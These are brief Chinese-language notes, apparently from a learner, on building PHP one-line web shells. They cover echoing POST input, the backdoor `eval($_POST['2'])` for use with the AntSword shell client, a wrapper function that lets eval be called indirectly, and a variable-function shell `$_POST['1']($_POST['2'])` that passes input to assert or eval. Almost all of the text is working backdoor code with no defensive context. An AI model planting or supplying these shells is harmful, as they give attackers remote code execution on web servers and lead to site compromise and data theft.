1、使用POST方法传递1
PHP:
#str = 'aaaa';
$str = $_POST['1'];
echo $str;
2、使用POST方法传递2
PHP:
#eval(phpinfo())
eval($_POST['2'])
使用中国蚁剑:
3、eval是一个语言构造器而不是一个函数,不能被可变函数调用
调用方法
function eval_1($str)
{
eval($str);
}
$a='eval_1';
$a('phpinfo()');
4、使用assert
PHP:
<?php
$_POST['1']($_POST['2']);
?>
方式一:assert()中必须是函数,所以要使用编码器
方式二:
在2中提交eval,eval可以包含字符串,assert只能包含函数